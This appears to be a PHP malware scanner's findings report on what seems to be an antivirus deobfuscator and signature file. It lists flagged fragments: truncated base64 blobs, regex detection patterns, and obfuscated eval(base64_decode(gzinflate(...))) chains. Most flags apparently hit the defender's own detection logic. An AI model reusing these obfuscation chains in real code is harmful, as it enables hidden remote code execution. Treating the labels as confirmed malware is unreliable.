"jXwLQ9rKE+9X2XJSCRUCITxVVARUWhQOoLZV/5yQBEgJCU2CgH3cr35nZnfR9jzu7Tlqsq9sZufxm5ndmAeFgn7wzT3IHUYHevEgsS54xsfnTwa7Ml3PCROH7oGOVbmDRCOwHXs03o5usTQPpQZ0WARPzmi19AITayfQSVVG5+1Oa3B/9PXr8bnuGdjcwEGMg8TZ9ijSjz9sF50v/hwrCr9UDGaFjssrilhRkhV1P/BxAmGEdSWoK0CdsoqcsD51/DhiNWaGoblVExdBMPWcRJolBt4qXOLF1eD6LIixZxl6Qsd7IzT9RyyoiLdrmmt/ZPpTx8PSKpRWDhJ9ozm8+dgaEBmQRHlo+eRGbhyEw9C05k44cqOrYEwNkFD5wkHCChYjK/BjmFbWDGPX8hxbW86W1AjpppcPEkexG3vOcWsR9cJgs2VPVCvJZPp2GLh2xp2GZoZqCmKBarXawcHBwrThN1xTHZIKqi4Lmy5fsZKYfmEJZTl...
| Exploit base64_long Line: 2080 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"bVVrb9s2FP0rrJbODhDHkinFttIUS+202dI8ELtdiyAQaImWCVGPkpQTu9h++y4fdoJin2IdHh7ee+4jJD7x458s9k9lPIy9jC5JSoV3yuIAkEEYe9/rFqWkQk2rEEFlFiGpBKtyzRkAZxR7zaqRK8q5hjBAJ4PYe5exNUo5kfLMW/A6LdBCbRoaeO9fn2Sqbn5BFqr03mul0Iqn4/FePLKQiIZ76MQGfjOfkizbaGTo7rHVnjSypI/PRkwjY0ACCPNvukAzTUMLcznQRgSBdmLN+Ha2UwiMHVHsXZK0oBmw0TlfkgVV9VcmVEssyxlyg9X+7QA7xZmqRTl8UQwd/rlOW/kKj1xouyyPwV5zoFMdxx6pFHtRHzqVcmMw+kxTg49sJDa328JgJmkoqSZ1PVGinkC9pSmkSVtHTlGbEV5LtCW5aLdMmWOdfQSvHJRUSpJTdIaooHkiaMOhYbre22jydjDwjpBn/+yIh6fmvvYlgNgb6By...
| Exploit base64_long Line: 2084 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"rRlrc9vGMX0kTafNH+iXwjQdSDEpESBBUlSojCzRthw9HErKhwoq5gicyKvwKg4QqTqeaZv2QyfTX9CZdvpPu7t3IKmHYzup7SGJxe7e7fth1rPa3d4r0Wtsyl673atk/I+FyLgrP3NXvsDPqnc8GH49GLpn8HRmVs5fNWrW692jndODweGJNzw6OplDEf+8sil6FnDrWHNuXhL7P5alrS8oYj8sgh/LrakvqLn9Py7YwgveZrmyxMu8wcB0z901c30k8kzM1qMkKEIu15GRA4ycjYUplnlUbvCoII9KyWPCWcAzdy2dpMim/QPZXCRJvsSmA2yanV6F+5PEqHwu/Uyk+ZbBQp7l7opZcdfcajCqb415PsiQoAsErcb3E4C4PFyi2QCabq8iE0RxV8mF0CMt4BMVMq9n/IqFBEbXQj8Vcwh6BsgZJMUonAPRwBZc263KiGX5dX3Lw3fuCr1FWzWBd5rx1JWPswg+6tkFfD56NSpEGGS...
| Exploit base64_long Line: 2085 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"rVmLe9o4Ev9XsvnSXhJqwLxJS3NpQttsSdIFso+Le/6ELUDF2F7LTqDx/u83M5KNyWO3e3dfW2pLmpE885un2JHZqh7di6Pqa3lUax7tSk/4C2mVZVKZ8djWb+E83H0tjkxYZNaPdi8GtucELs8napuJF1sTdZzoHu3iIPBZMuEjS6scJTjd0NM2bTTl3LWjYBLE0rZxuqnZDs4vP73v98/s61F/iBMtnGjAhKY69QT3Y5xp40wHOUoWctvlnliKmEeKYQe/EvZzhQy5L3lklVkUC8fDwyFBdrAusjFhg/7lJ9vJuZtVPT46+dwvjpNkWlsfwn1XbWrW9ORocKI325zXRAnVqke7Pr+zZGkwuNBsrX3rgBaQjNpw5olVjqNExkUBmiiiFojI2rNBNj/3h9aNJQ9v/rH75eN4/Nke9t/3h/0hvsOwhT+v9PxjXijVRg153TDj24nxr6rRtb+UYH0P/tEBD9+N8GCv4Yk784DIUOR1OKD...
| Exploit base64_long Line: 2086 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"jVhtc9pGEP4rVONxE1NjJCRe5JAMxiRlAoYCcceNOswhHXAToVMlAXHq/vfu7p14bdp+sCxr9/b2nt19ds/MNct190/hlm9T16y5xrjd6ntpcdh6GrZ68LIxboVrotB0jfbjo+ulV96FT58t/FxxjW60YaEIQHvy+ICCitbXgsJIfbbhs112jYDP2TrMxhnL1inYa8LP5x+N37tRxpOIZ4U7Fn0R0QLXOLDGqrvGm0xkIX8Lmm0Wi4z7sFuuj3pV1Ksd6sHmPFWKgygUEUe1GqhVGq4h9FI8avcBntF6NeMJvAjwqJjwP9Yi4QEuqevDaMtjlqT4uaEP/2aWvG1N+soQgUVQgsttGc1FsmKZkBE6MRmSGMG0nENPW7OUnRzHRGwt2PUa5EP2PGQhvLy5UWtIg0BuHNoBPXqGJEe0LUtbSMQG/Dg14ZyZ+BSJNpxbKCeqWo7xAAflHB6tFU+Ez0he00dphWLGZuwymqXxbZ9F6znzs3X...
| Exploit base64_long Line: 2087 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"7b0Je9vWtSj6V2wltgiRIomBkyiKcRznNL0ZeuykOa0gqyAJibApgiGoyYLeb39r2gNASHaGpud996U1hWFjj2uvea0dHXR87+AuOWgPswPX9Q92DqNwXp+v47NwvjeCf2E4Pt7dOZlvNqtsfNBqHb9twe1duzEY3IfX7+J1Ft9mx2/xmdsI2vdSHr48Og6vw7l6PJGiY3nabrid+8NWdLQzTA5caN3re9B6LTlbRxexA52ojQ/Ca/ga2uGuUL3XXJ+04Yyz9dR6jd08gGvs5+5OaxiOsX3oakt9GDah3tV8lU/PEwf6CsW4kKn00xrGUlQ229wu4vw6mW3m+TxOzucbx/6OysySbLWIbuEGP1qmy5g/HzpjKZcft13vRG4cBxrzsfkj+HfYCl2aJg8XKQhgmrLpOlltwqy+uV3FYQatZfThJr7ZtN5FVxEXoA5kezhHUmZn9wRaltV0xq3WJNmEzcVt6zicRfsfTu6Chuvdy3dH8O+...
| Exploit base64_long Line: 2088 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"nViNc9rKEf9XbKZxwYCEAAEWlv0SN29e3ry0M0k606nPzZzRCZQISZUOYx7wv3d3706ID3uSjhOE7nb39nZ/+wX3Ro63jrzOuPBGfa92XUzyKJOsaMY8mS74VPi/8yf+2awW+cS/5+0/37b/3WlffX1o2ntvLGgyK5tlrLi8ubaVrJvaOPIckN8febUgnSzmIpHMWuaRFEDH6vCxSEQx4Zl6v/9r7WHdaTnbN70J8naBd3BV5Z0K+T4W+L14t/rCp3/nc6H4ZoIH+GQNdt9hD8ziWSaS4G4WxQGrc9ZAgT0Q2AVloozVZ2ki2CYNgGET5VHBNt+jJIgF0vW10sWc5zJTlI8xn3x/FHm+Ypu5/A4LPOBsswSmdFmcERXyusDb63i1STrPeMw2IuYR8ociScSEbWZgmTRDygFq0/VqL1MMkQIMwOrhIpnIKE3gKq1H1lhHIavb8JIEORKOUGEgjMIcLWIVchXDYxkFcgam9eF/adxO9lx...
| Exploit base64_long Line: 2092 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"YTo1OntzOjEwOiJ3aXphcmQucGhwIjtzOjM3OiJjbGFzcyBXZWxjb21lU3RlcCBleHRlbmRzIENXaXphcmRTdGVwIjtzOjE3OiJ1cGRhdGVfY2xpZW50LnBocCI7czozNzoieyBDVXBkYXRlQ2xpZW50OjpBZGRNZXNzYWdlMkxvZygiZXhlYyI7czoxMToiaW5jbHVkZS5waHAiO3M6NDg6IkdMT0JBTFNbIlVTRVIiXS0+SXNBdXRob3JpemVkKCkgJiYgJGFyQXV0aFJlc3VsdCI7czo5OiJzdGFydC5waHAiO3M6NjA6IkJYX1JPT1QuJy9tb2R1bGVzL21haW4vY2xhc3Nlcy9nZW5lcmFsL3VwZGF0ZV9kYl91cGRhdGVyLnBocCI7czoxMDoiaGVscGVyLnBocCI7czo1ODoiSlBsdWdpbkhlbHBlcjo6Z2V0UGx1Z2luKCJzeXN0ZW0iLCJvbmVjbGlja2NoZWNrb3V0X3Z...
| Exploit base64_long Line: 8766 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
'7Z0JYBTV/cfn2myWJLvJZsMVxCCgeADe9UAlhABRSEII3gq21Wq1ak+tokFttbRUQfBWRFvrXa21VWsLWK1HT3vaVlvofQtFFAST/N+bmd1989mZ2RxLwr/s4Pr2s9957/femzdv3kx2f7/XX3/9dU2zIq0TDE1bbGpyq4z/+h4ts+m6eDnvxKtOS1PultYfaXW4Dpp8/UTCO5o2da7z+eLTvWVY4iVr0a1si0TVxH/alGlCn+q8l/tEYEO+f7zV0biZSrlD3M/k+3Q+qdW9nW1bOpX9Yqn7uPnKXPvj3X33dvffW8kvX4abpu1bCvttMv9kfDZfvKaWecuUdZBlVM4NKMhnk/nWvd3z/eVW46b7uOmBbjpK2adOvPbqY37ZDjV/+pikKzzV6F19/bbZoowhCss+fE5zjl+agzZLeV0sXuvE63F8Hra1uuU/4hrJNMd9E02kt3ip2Mrl7qVWaWa3k938LwTkj0SdLVIit2hUtwxL3Ra...
| Exploit base64_long Line: 8768 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
'7ZrLUhpBFIZ7huEyiiJe8IIoKt7wMm1VllYFNqkskpSLPIDvkY3LLF1mmefIiqos8hAs8hDZYMlAuofu6e4fUQgaielf29Nfn+5zpmemAM/QbDabhHjJixNCyFWCcN3++PyNKDnRL5F/lUXx8TJr2cUelwfMIbuKa4umv8vkCiv5lWvm1I9Dz3FXPilXNBmXaP2y8H2p9O8xOi9abD1HQjQ+1xNj0jqiuZDfhXEUX5+EsYTWl3H1fQwrvq5RGW3NvrBU2HXNV2Zt+65FsLmrPCF57QpmidrHlGiDVK7HKk8EuwkvmUpn/Kni3Tzq+ufez6TzQ+fbsmXLli2/DH7u9xvLli1btmzZ8rNzLU/I5RwbZ5aylq3X04OKJ3Wtz+fWwY/LEsAeMNZhUsBp4AywD8zrHHwfUkXWHDiwGcwplU6zlvIc4nENKh/1SZbXRq3jHAnb6fY0bD5UVlhZ/cH9aS5xGpyh9/YU8VA51q5zvXshul/YRW3...
| Exploit base64_long Line: 8770 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
'7ZtNk9REGMefZF72jd0MD6ALC7sDgryIAr6iogwKCIgUBw8cPGCVJ7+CB+cjcPDgkYMHLlbxDdwqrdKjR6v24FegysuyLDumJ88/yfN0ZmZnRmpgzW+rt///7qQ76STdPZ2ZtbW1NaJqjS4RUbtCjjs3l5kUQfp/X+qKaRodmO2PumrOZr69ovfvxNQlhj8a6jKcjpOoInWsL2f1Ta8keZa6BJRLOd2U8v46k+27gI0u6fPKn18tDgfkeJYkDXEo6RWJq7kAX8SSqYOkjDyBHLuLr5n264crp3V2+9s7jkuMYzpStFFRg+do1bSfj8MiZefV734KwJQj8JgKqkG8UbVST3wtJZhONwr1PsYOzp8gM9K8D8IkfijPwm1pvK8qyX29WknSW9XkMcZz91NYcHkacl3i0I6BdvfUz3Heqmx2Y47o+4jomLl+oHsIwYCLvwO4G4ev4/BNHO45Hzfs3bidv52N44bcv/1u4jGY91ICV1WQ98P...
| Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"YToxNTY1OntzOjM6IuKAqCI7czoxOiIgIjtzOjM6IuKAqSI7czoxOiIgIjtzOjM6IuGagCI7czoxOiIgIjtzOjM6IuKAgCI7czoxOiIgIjtzOjM6IuKAgSI7czoxOiIgIjtzOjM6IuKAgiI7czoxOiIgIjtzOjM6IuKAgyI7czoxOiIgIjtzOjM6IuKAhCI7czoxOiIgIjtzOjM6IuKAhSI7czoxOiIgIjtzOjM6IuKAhiI7czoxOiIgIjtzOjM6IuKAiCI7czoxOiIgIjtzOjM6IuKAiSI7czoxOiIgIjtzOjM6IuKAiiI7czoxOiIgIjtzOjM6IuKBnyI7czoxOiIgIjtzOjI6IsKgIjtzOjE6IiAiO3M6Mzoi4oCHIjtzOjE6IiAiO3M6Mzoi4oCvIjtzOjE6IiAiO3M6Mjoiw4IiO3M6MToiICI7czoyOiLfuiI7czoxOiJfIjtzOjM6Iu+5jSI7czoxOiJfIjtzOjM6Iu+5jiI...
| Exploit concat_vars_array Warning Concatenation of arrays technique is usually used for the obfuscation of malicious code |
$JYekrRTYM[2] . $JYekrRTYM[14] . $JYekrRTYM[13] . $JYekrRTYM[21] . $JYekrRTYM[4] . $JYekrRTYM[17] . $JYekrRTYM[19] . $JYekrRTYM[26] . $JYekrRTYM[20] . $JYekrRTYM[20] . $JYekrRTYM[3] . $JYekrRTYM[4] . $JYekrRTYM[2] . $JYekrRTYM[14] . $JYekrRTYM[3] . $JYekrRTYM[4]; return Helpers::convertToSafeFunc($jPnPLPZcMHgH) ? $jPnPLPZcMHgH($sBtUiFZaz) : ''; }
| Exploit download_remote_code2 Line: 16282 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine |
fwriteB64DecodedStr',
],
[
'full' => '~file_put_contents\(\$_SERVER\[\'[^\']+\'\]\.\'[^\']+\',base64_decode\(\'[^\']+\'\)
| Exploit eval_base64 Line: 16766 Dangerous RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine |
eval(base64_decode(')
| Exploit eval_base64 Line: 16808 Dangerous RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine |
eval(base64_decode(\')
| Exploit eval_base64 Line: 17160 Dangerous RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine |
eval(base64_decode(' . $matches[3] . ')
| Exploit eval_base64 Line: 22248 Dangerous RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine |
eval(base64_decode(gzinflate(base64_decode(')
| Exploit eval_base64 Line: 22604 Dangerous RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine |
eval(base64_decode(gzinflate(base64_decode(\'' . $matches[6] . '\')
| Exploit eval_preg Line: 22504 Dangerous RCE (Remote Code Execution), through PCRE (Perl compatible Regular Expression), allow remote attackers to execute arbitrary commands or code on the target machine |
preg_replace("/' . $matches[2] . '/e",\'\'', '\'\',"' . $matches[2] . '")
| Exploit execution Line: 1665 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(str_rot13(strrev(trim(file_get_contents($avdb_file)
| Exploit execution Line: 16766 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
eval(base64_decode(')
| Exploit execution Line: 16808 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
eval(base64_decode(\')
| Exploit execution Line: 17160 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
eval(base64_decode(' . $matches[3] . ')
| Exploit execution Line: 17397 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(str_rot13($layer2)
| Exploit execution Line: 17506 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(str_rot13($match[2])
| Exploit execution Line: 17510 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(str_rot13($m[2])
| Exploit execution Line: 17575 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(gzinflate(base64_decode(str_rot13($matches[3])
| Exploit execution Line: 18256 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(gzinflate(str_rot13(convert_uudecode(gzinflate(base64_decode(strrev($matches[12])
| Exploit execution Line: 18691 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(base64_decode($matches[4])
| Exploit execution Line: 18758 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(str_rot13($matches[4])
| Exploit execution Line: 19362 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(str_rot13(Helpers::getTextInsideQuotes(end($array)
| Exploit execution Line: 19370 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(str_rot13(Helpers::getTextInsideQuotes(Helpers::getEvalCode($phpcode)
| Exploit execution Line: 19484 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(base64_decode(str_rot13($str_to_concat)
| Exploit execution Line: 20037 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(base64_decode($result)
| Exploit execution Line: 20660 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(str_rot13($m[1])
| Exploit execution Line: 20757 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(str_rot13($encodedStr)
| Exploit execution Line: 21953 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
eval(base64_decode')
| Exploit execution Line: 21957 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
eval(gzinflate(base64_decode')
| Exploit execution Line: 22037 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
eval(gzinflate(str_rot13(base64_decode(' . $matches[2] . ')
| Exploit execution Line: 22092 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(gzinflate(str_rot13(convert_uudecode(gzinflate(base64_decode($matches[1])
| Exploit execution Line: 22154 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(str_rot13($openssl_data[2])
| Exploit execution Line: 22155 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(str_rot13($openssl_data[4])
| Exploit execution Line: 22158 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(str_rot13($decoded)
| Exploit execution Line: 22248 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
eval(base64_decode(gzinflate(base64_decode(')
| Exploit execution Line: 22249 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(gzinflate(base64_decode($matches[11])
| Exploit execution Line: 22261 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(gzinflate(base64_decode($matches[4])
| Exploit execution Line: 22323 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(gzinflate(base64_decode($matches[2])
| Exploit execution Line: 22377 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(str_rot13(implode('', $array)
| Exploit execution Line: 22487 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
eval(str_rot13(gzinflate(str_rot13(gzinflate(base64_decode(')
| Exploit execution Line: 22604 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
eval(base64_decode(gzinflate(base64_decode(\'' . $matches[6] . '\')
| Exploit hex_char Line: 15511 Dangerous Hex char is usually used for the obfuscation of malicious code |
\x5f
| Exploit ioncube_loader Line: 15345 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
IonCube_loader
| Exploit md5_create_function Dangerous The `create_function` technique is usually used for the obfuscation of malicious code |
$md5 = md5($res); $res = base64_decode(str_replace($md5, '', strtr($matches[5], $matches[6], $matches[7]))); if (preg_match('~eval\((?:\$[^(]{0,50}\(){2}\$[^,]{0,50},\s{0,10}\'([^\']{1,500})\',\s{0,10}\'([^\']{1,500})\'\){3};~msi', $res, $match)) { $res = Helpers::replaceVarsFromArray($vars, $res); if (preg_match('~eval\(base64_decode\(strtr\(~msi', $res)) { $res = base64_decode(strtr($arr1, $match[1], $match[2])); } } } return $res; } private function deobfuscateEvalArrayVar($str, $matches) { $...
| Exploit nano Line: 12287 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$expr_arr[1](explode(',', $expr_arr[2])
| Exploit nano Line: 12293 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$expr_arr[1]((int)
| Exploit nano Line: 12296 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$expr_arr[1]($expr_arr[2])
| Exploit nano Line: 14123 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$args[1](@$args[2]($args[3])
| Exploit nano Line: 14145 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$args[0](@$args[1]($args[2])
| Exploit nano Line: 14193 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$params[$i]($params[0])
| Exploit nano Line: 14876 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$func_params['func']($val1)
| Exploit nano Line: 14894 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$func_params['func']($val1, $val2)
| Exploit nano Line: 15014 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$function_otions['func'](...$params_array)
| Exploit nano Line: 16794 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$_[GPRC](?:OST|ET|EQUEST|OOKIE)
| Exploit nano Line: 19821 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$match[2]($str[$dictionaryName], $match[4])
| Exploit nano Line: 20382 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$matches[4]($matches[6])
| Exploit nano Line: 22583 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$m[1]($m[2])
| Exploit nano Line: 23614 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$config[$class](...$constructorArgs)
| Exploit reversed Line: 16033 Dangerous Reverse function technique is used for the obfuscation of dangerous PHP functions |
ecalper_rts
| Exploit silenced_eval Line: 17499 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine |
@eval((?:\(\$[0O]+\[[\'"]\w+[\'"]\])
| Function assert Warning Potentially dangerous function `assert` [https://www.php.net/assert] |
assert(', 'eval(', $string); $string = str_replace('@@slaquote@@', '\\\'', $string); $string = str_replace('@@sladquote@@', '\\"', $string); $string = str_replace("eval(''.", 'eval(', $string); $res = str_replace($find, $string, $str); if (strpos($string, 'gzinflate(\'') !== false) { $res = $this->deobfuscateEval(stripcslashes($res), []); } return $res; } private function deobfuscateEval($str, $matches) { if (preg_match('~\)+\..{0,30}base64_decode~msi', $str)) { $res = explode(').', $str); $res ...
| Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function(\'', $cr_func, 2)); $func = implode(') {', explode('\',\'', $func, 2)); $func = substr($func, 0, -2) . '}'; $str = str_replace($cr_func, $func, $str); } return $str; } public static function calc($expr) { if (is_array($expr)) { $expr = $expr[0]; } $expr = str_replace([' ', "\r", "\n", "\t"], '', $expr); preg_match('~(chr|min|max|round)?\(([^\)]+)\)~msi', $expr, $expr_arr); if (@$expr_arr[1] == 'min' || @$expr_arr[1] == 'max') { return $expr_arr[1](explode(',', $expr_arr[2])); } e...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval(?&c)\()?(?&c)rawurldecode(?&c)\((?&c)\3(?&c)\)(?&c)\s*\^\s*substr(?&c)\((?&c)str_repeat(?&c)\((?&c)\2,\s*(?&c)\((?&c)strlen(?&c)\((?&c)\3(?&c)\)(?&c)/strlen(?&c)\((?&c)\2(?&c)\)(?&c)\)(?&c)\s*\+\s*1(?&c)\)(?&c),\s*0,(?&c)\s*strlen(?&c)\((?&c)\3(?&c)\)(?&c)\)(?&c)\)(?:(?&c)\s*\.\s*\'{\'(?&c)\))?(?&c);~msi', 'id' => 'xorFName', ], [ 'full' => '~(\$\w{1,40})=base64_decode\(\'[^\']+\'\);(\$\w+)=base64_decode\(\'[^\']+\'\);(\$\w+)=base64_decode\(\'([^\']+)\'\);eval\(\1\(gzuncompress\(\2\(\3\)\)\...
| Function posix_getpwuid Warning Potentially dangerous function `posix_getpwuid` [https://www.php.net/posix_getpwuid] |
posix_getpwuid($owner_id); if (!isset($owner['name']) || $owner['name'] !== 'root') { return false; } } elseif ($owner_id != 0) { return false; } $perms = fileperms($folder); if (($perms & 0x0100) && ($perms & 0x0080) && ($perms & 0x0040) && !($perms & 0x0800) && !($perms & 0x0010) && !($perms & 0x0002) ) { return true; } return false; } protected function isWorldWriteable($folder) { if (!file_exists($folder) || !is_dir($folder)) { return false; } $perms = fileperms($folder); if (($perms & 0x000...
| Function posix_kill Warning Potentially dangerous function `posix_kill` [https://www.php.net/posix_kill] |
posix_kill($pid, SIGUSR1); } else { $this->debugLog("Job {$file}: Sending SIGUSR2 to {$pid}"); posix_kill($pid, SIGUSR2); } } elseif ($type == 'notify' && $malware) { $filename = basename($file, '.notify_job'); $reports[JSONReport::class] = $this->resident_out_dir . '/' . $filename . '.report'; foreach($this->report->call($this, $reports) as $report) { $report->generateReport($vars, $scan_time); $this->debugLog("Job {$file}: Creating report for job in {$filename}.report"); $report->write(); } un...
| Function posix_setuid Warning Potentially dangerous function `posix_setuid` [https://www.php.net/posix_setuid] |
posix_setuid($info['uid']); $defaults['userid'] = $info['uid']; $defaults['groupid'] = $info['gid']; } else { echo ('Invalid username'); exit(-1); } } if (isset($options['no-users'])) { $vars->users = null; } $avdb = ''; if ((isset($options['avdb']) && !empty($options['avdb']) && ($avdb = $options['avdb'])) || (isset($options['c']) && !empty($options['c']) && ($avdb = $options['c']))) { if (file_exists($avdb)) { $defaults['avdb'] = $avdb; } } if ((isset($options['file']) && !empty($options['file...
| Function str_rot13 eval_str_rot13 Line: 15166 Dangerous Encoded Function `eval` [https://www.php.net/eval] |
riny
| Function strrev eval_strrev Line: 15174 Dangerous Encoded Function `eval` [https://www.php.net/eval] |
lave
| Function strrev eval_strrev Line: 8770 Dangerous Encoded Function `eval` [https://www.php.net/eval] |
LAvE
| Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system (Default: 1).
